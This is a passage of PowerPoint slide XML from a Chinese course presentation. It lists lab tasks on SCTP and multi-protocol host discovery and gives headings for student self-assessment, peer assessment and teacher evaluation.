                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="1400" b="0">
                        <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="0" marB="0" vert="horz" anchor="ctr" anchorCtr="0">
                    <a:lnL w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnL>
                    <a:lnR w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnR>
                    <a:lnT w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnT>
                    <a:lnB w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnB>
                    <a:lnTlToBr>
                      <a:noFill/>
                    </a:lnTlToBr>
                    <a:lnBlToTr>
                      <a:noFill/>
                    </a:lnBlToTr>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="419735">
                <a:tc vMerge="1">
                  <a:tcPr>
                    <a:lnL w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnL>
                    <a:lnR w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnR>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr indent="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>6.SCTP协议的主机发现并分析</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="1400" b="0">
                        <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="0" marB="0" vert="horz" anchor="ctr" anchorCtr="0">
                    <a:lnL w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnL>
                    <a:lnR w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnR>
                    <a:lnT w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnT>
                    <a:lnB w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnB>
                    <a:lnTlToBr>
                      <a:noFill/>
                    </a:lnTlToBr>
                    <a:lnBlToTr>
                      <a:noFill/>
                    </a:lnBlToTr>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr indent="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="1400" b="0">
                        <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="0" marB="0" vert="horz" anchor="ctr" anchorCtr="0">
                    <a:lnL w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnL>
                    <a:lnR w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnR>
                    <a:lnT w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnT>
                    <a:lnB w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnB>
                    <a:lnTlToBr>
                      <a:noFill/>
                    </a:lnTlToBr>
                    <a:lnBlToTr>
                      <a:noFill/>
                    </a:lnBlToTr>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="420370">
                <a:tc vMerge="1">
                  <a:tcPr>
                    <a:lnL w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnL>
                    <a:lnR w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnR>
                    <a:lnB w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr indent="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>7.自定义多协议的主机发现并分析</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="1400" b="0">
                        <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="0" marB="0" vert="horz" anchor="ctr" anchorCtr="0">
                    <a:lnL w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnL>
                    <a:lnR w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnR>
                    <a:lnT w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnT>
                    <a:lnB w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnB>
                    <a:lnTlToBr>
                      <a:noFill/>
                    </a:lnTlToBr>
                    <a:lnBlToTr>
                      <a:noFill/>
                    </a:lnBlToTr>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr indent="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="1400" b="0">
                        <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="0" marB="0" vert="horz" anchor="ctr" anchorCtr="0">
                    <a:lnL w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnL>
                    <a:lnR w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnR>
                    <a:lnT w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnT>
                    <a:lnB w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnB>
                    <a:lnTlToBr>
                      <a:noFill/>
                    </a:lnTlToBr>
                    <a:lnBlToTr>
                      <a:noFill/>
                    </a:lnBlToTr>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6786245" y="6761480"/>
            <a:ext cx="5080000" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" b="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>
  </p:transition>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tn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a:xfrm>
            <a:off x="533756" y="1971129"/>
            <a:ext cx="4302496" cy="521035"/>
            <a:chOff x="6627851" y="1871939"/>
            <a:chExt cx="4302496" cy="521035"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="矩形: 圆角 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="1871939"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="矩形 3" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="2086269"/>
              <a:ext cx="3636897" cy="306705"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="文本框 570"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7274400" y="1887541"/>
              <a:ext cx="1402080" cy="460375"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>学生自评</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="文本框 571"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="1914354"/>
              <a:ext cx="418704" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="533756" y="3513239"/>
            <a:ext cx="4302496" cy="524299"/>
            <a:chOff x="6627851" y="3492048"/>
            <a:chExt cx="4302496" cy="524597"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3709766"/>
              <a:ext cx="3636897" cy="306879"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3492048"/>
              <a:ext cx="1402080" cy="460637"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>学生互评</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="418704" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="组合 11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="562331" y="4955527"/>
            <a:ext cx="4302496" cy="525366"/>
            <a:chOff x="6627851" y="5163977"/>
            <a:chExt cx="4302496" cy="525665"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="矩形: 圆角 28"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="5163977"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="矩形 13" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="5382763"/>
              <a:ext cx="3636897" cy="306879"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="文本框 576"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="5193635"/>
              <a:ext cx="2011680" cy="460637"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>教师综合评价</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="文本框 577"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="5210848"/>
              <a:ext cx="418704" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
